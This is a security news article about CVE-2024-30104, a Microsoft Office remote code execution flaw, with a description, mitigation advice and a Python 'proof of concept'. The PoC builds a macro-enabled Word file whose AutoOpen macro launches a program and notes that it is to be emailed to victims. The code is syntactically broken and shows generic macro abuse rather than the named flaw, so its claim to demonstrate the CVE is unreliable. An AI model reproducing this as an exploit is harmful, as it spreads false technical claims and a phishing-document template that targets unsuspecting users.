CVE CyberSecurity Database News

CVE-2024-30104: Unveiling a Critical Microsoft Office Remote Code Execution Vulnerability

Poster -

It is a widely known fact that Microsoft Office is a commonly used suite of applications. The suite includes prominent applications like Microsoft Word, Excel, PowerPoint, and many more. Millions of individuals and businesses around the world regularly rely on these applications for their daily work. Therefore, any security vulnerability in these products can have a significant impact. This article aims to shed light on a recently discovered critical vulnerability, CVE-2024-30104, that targets the Microsoft Office suite and allows an attacker to execute arbitrary code remotely on the victim's system. This remote code execution (RCE) vulnerability can compromise the privacy and security of millions of users globally.

Exploit Details

The CVE-2024-30104 vulnerability is classified as a remote code execution vulnerability that impacts several versions of Microsoft Office. An attacker who successfully exploits this vulnerability can gain the ability to execute malicious code remotely with the privileges of the logged-in user, potentially taking full control of the victim's system. The attacker could then install malicious software, manipulate data, or create new accounts with administrative privileges.

Original References

- Primary Source: CVE-2024-30104 on the National Vulnerabilities Database

- Additional Sources

- Microsoft Security Advisory
- Exploit Database

Code Snippet - Proof of Concept

A proof of concept (PoC) code snippet is provided below to demonstrate how an attacker could exploit this vulnerability:

// Import necessary libraries and functions
import os, subprocess, sys
import win32com.client

def create_malicious_file(malicious_code):
  # Create a new Word document
  word = win32com.client.Dispatch('Word.Application')
  word.Visible = False
  doc = word.Documents.Add()

  # Insert the malicious code
  doc.Range(,).InsertBefore(malicious_code)

  # Save and close the document
  doc.SaveAs("malicious.docm")
  doc.Close()
  word.Quit()

def main():
  # Craft malicious VBA code
  malicious_code = '''
  Sub AutoOpen()
    Dim obj As Object
    Set obj = CreateObject("WScript.Shell")
    obj.Run "calc.exe"
  End Sub
  '''

  # Create a malicious Word document
  create_malicious_file(malicious_code)

  # Send the malicious document to the target user via email (insert your custom email function)

if __name__ == "__main__":
  main()

This snippet demonstrates a simple example of creating a malicious Microsoft Word document (with a ".docm" extension) containing VBA macro code that launches the Windows calculator application (calc.exe) upon opening. An attacker could send this document to unsuspecting victims via email or other methods, and upon opening the document, the malicious code would be executed.

Mitigation

To protect against CVE-2024-30104, users and administrators should ensure Microsoft Office is updated with the latest security patches. Microsoft has acknowledged the vulnerability and released a patch that effectively mitigates this issue. In addition to applying the security patch, users should:

- Disable Macros: Configure Microsoft Office settings to disable the automatic execution of macros. This limits the attack surface related to this vulnerability.
- Implement user awareness training: Educate users about the risks of opening files and enabling macros from unknown or untrusted sources to help reduce the risk of exploitation.
- Enable system protections: Ensure antivirus and other security software are up to date for swift detection and prevention of any malicious activity.

Conclusion

CVE-2024-30104 is a critical remote code execution vulnerability in Microsoft Office that could potentially compromise the privacy and security of millions of users worldwide. Users and administrators should apply the latest security patches and implement the recommended mitigations to safeguard their systems from potential exploits. This article has provided insights into the vulnerability, its severity, and potential impact, along with mitigation advice and a simple code snippet to demonstrate the exploitability of this issue.

Timeline

Published on: 06/11/2024 17:16:00 UTC
Last modified on: 07/19/2024 21:13:40 UTC